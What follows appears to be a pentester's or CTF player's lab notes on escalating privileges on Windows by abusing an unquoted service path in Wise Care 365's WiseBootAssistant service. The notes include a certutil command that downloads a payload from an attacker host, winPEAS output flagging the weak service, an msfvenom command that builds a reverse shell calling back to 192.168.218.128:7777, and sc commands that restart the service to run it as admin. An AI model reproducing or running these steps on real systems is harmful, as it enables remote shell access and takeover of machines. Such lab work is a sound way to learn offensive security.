ls on windows is dir
moving file to windows:
certutil.exe -urlcache -f http://192.168.218.128/Wise.exe Wise.exeFind privEsc with winPEAS
WiseBootAssistant(WiseCleaner.com - Wise Boot Assistant)[C:\Program Files (x86)\Wise\Wise Care 365\BootTime.exe] - Auto - Running - No quotes and Space detected
YOU CAN MODIFY THIS SERVICE: AllAccess
File Permissions: Administrators [AllAccess]
Possible DLL Hijacking in binary folder: C:\Program Files (x86)\Wise\Wise Care 365 (Administrators [AllAccess])
In order to optimize system performance,Wise Care 365 will calculate your system startup time.No quotes and space detected meaning:
windows will go thru the path and try: C:\Program.exe until it finds the exe. We can put Wise.exe inside \Wise\ as a payload!
Creating msfvenom payload:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.218.128 LPORT=7777 -f exe > Wise.exehow to run it as root/admin?:
stop the WiseBootAssistant service:
sc stop WiseBootAssistantthen start it again:
sc start WiseBootAssistant